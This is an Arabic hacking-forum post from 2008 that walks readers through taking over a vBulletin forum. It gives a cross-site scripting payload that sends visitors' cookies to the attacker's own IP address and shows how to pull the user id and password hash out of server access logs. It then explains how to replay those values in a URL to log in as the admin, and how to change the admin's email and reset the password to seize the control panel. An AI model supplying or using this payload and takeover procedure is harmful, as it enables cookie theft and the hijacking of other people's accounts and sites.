منتديات الطاهري ترحب بكم اجمل ترحيب
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


منتديات الطاهري ترحب بكم اجمل ترحيب
 
الرئيسيةالبوابةأحدث الصورالتسجيلدخول

 

 اختراق الـ vBulletin 100%

اذهب الى الأسفل 
كاتب الموضوعرسالة
khibrra
khibrra
khibrra
khibrra


عدد الرسائل : 136
العمر : 31
المزاج : اختراق الـ vBulletin 100% Thrthar
البلد : اختراق الـ vBulletin 100% Ma10
جنس العضو : اختراق الـ vBulletin 100% Male
تاريخ التسجيل : 12/02/2008

اختراق الـ vBulletin 100% Empty
مُساهمةموضوع: اختراق الـ vBulletin 100%   اختراق الـ vBulletin 100% I_icon_minitimeالسبت مارس 08, 2008 9:39 am

لمتطلبات : WebServer تركيب سيرفر على جهازك الشخصيISS

تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..

قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
**********.write('<img
src="http://my_ip_address/'+dci-designs-protection+'">';</******>

مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb




ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54




20]=1012444064;%20bblastvi
sit=1011983161

فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجود لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن .. اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://tahiri.mam9.com
 
اختراق الـ vBulletin 100%
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات الطاهري ترحب بكم اجمل ترحيب :: ·.¸¸.·°¯ ¯°·.¸¸.·°¯ مــنــتــدى الــهــاكــر والــحــمــايــة·.¸¸.·°¯ ¯°·.¸¸.·°¯ :: منتدى اختراق المواقع و المنتديات-
انتقل الى: